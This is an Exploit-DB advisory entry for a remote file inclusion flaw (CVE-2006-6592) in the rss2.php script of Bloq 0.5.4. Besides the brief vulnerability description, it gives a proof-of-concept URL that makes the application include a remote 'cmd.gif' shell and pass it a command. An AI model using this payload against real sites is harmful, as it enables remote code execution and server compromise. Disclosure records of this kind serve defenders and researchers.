Bloq 0.5.4 - rss2.php pagepath Parameter Remote File Inclusion

2006-10-13T00:00:00
ID EDB-ID:28800
Type exploitdb
Reporter KorsaN
Modified 2006-10-13T00:00:00

Description

Bloq 0.5.4 rss2.php page[path] Parameter Remote File Inclusion. CVE-2006-6592. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20512/info
   
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
   
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
   
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.

http://www.example.com/[PATHTOSCRİPT]/rss2.php?page[path]=http://www.example.com/cmd.gif?&cmd=l10:32